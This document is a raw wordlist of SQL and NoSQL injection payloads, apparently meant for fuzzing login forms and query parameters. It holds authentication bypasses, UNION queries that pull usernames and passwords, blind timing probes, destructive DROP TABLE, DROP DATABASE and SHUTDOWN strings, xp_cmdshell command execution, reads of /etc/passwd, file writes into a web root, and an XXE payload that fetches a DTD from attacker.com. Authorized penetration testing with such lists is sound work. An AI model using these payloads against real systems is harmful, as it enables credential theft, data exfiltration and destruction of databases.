' OR '1'='1
' OR 1=1-- -
' OR 0=0--
" OR ""="
' OR 'x'='x
" OR "x"="x
') OR ('x'='x
" OR 1=1-- -
' OR a=a--
" OR "a"="a
') OR ('a'='a
")) OR (("a"="a
' OR 1=1#
") OR ("x"="x
' OR x=x#
" OR x=x-- -
' OR x=y#
'-
' --
' #
"-
" --
" #
' OR 1=1--
") OR 1=1--
' OR 'x'='y
") OR "x"="y
' OR 1=1 LIMIT 1-- -
' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
' AND 1=1 UNION ALL SELECT 1, concat(username,':',password) FROM users--
'::text, pg_sleep(10)--
'; SELECT pg_sleep(10); --
' AND 1=1; DROP TABLE users--
') AND 1=1; DROP TABLE users--
'; DROP TABLE users--
'; DROP DATABASE testdb; --
'; SELECT * FROM information_schema.tables;--
'||pg_sleep(10)--
'; WAITFOR DELAY '00:00:10';--
'; EXEC xp_cmdshell('ping 10.10.10.10')--
' AND 1=2 UNION SELECT NULL, username || ':' || password FROM users;--
' AND EXISTS(SELECT 1 FROM users WHERE username='admin' AND password LIKE '%')--
'||SLeeP(3)&'1
"+SLeeP(3)+"
"+(SELECT load_file('/etc/passwd'))+"
'||(SELECT load_file('/etc/passwd'))||'
{$gt: ""}
{$ne: null}.skip(20)
', $where: '1 == 1
', $where: '1 == 1', $comment: 'successful injection
{ $regex: '.*' }
', $gt: { $binary: 'base64_encoded_payload', $type: '00' }
', $where: 'this.password.match(/.*/)'
{ $where: 'function() { return true; }' }
'; return true; return '
'; while(true){}
'; alert(1); '
'; $inc: {age: 1} }
'; db.dropDatabase();
'; $set: {email: 'hacked@example.com'} }
' AND ASCII(SUBSTRING((SELECT VERSION()),1,1)) > 52--
' AND NOT 1=1--
' AND 1=1--
' AND 1=2--
' ORDER BY 1--
' ORDER BY 1, 2--
' ORDER BY 1 DESC--
' GROUP BY x--
' FETCH FIRST 1 ROW ONLY--
' UNION SELECT NULL--
' UNION SELECT ALL NULL--
' UNION SELECT 1, 'a'--
' UNION SELECT * FROM information_schema.tables--
' UNION SELECT * FROM information_schema.columns--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND (SELECT * FROM Users) ORDER BY 1--
1; SHUTDOWN--
' INTO OUTFILE '/var/www/html/hack.txt
' INTO DUMPFILE '/tmp/sqli.txt
' RLIKE (SELECT (CASE WHEN (SUBSTRING(VERSION(), 1, 1) = '5') THEN 0x28 ELSE 0x41 END))--
AND EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">%remote;]>'), '/l')
AND UPDATEXML(xmltype('<?xml version="1.0" encoding="UTF-8"?><root>test</root>'), '//root', 'xyz')

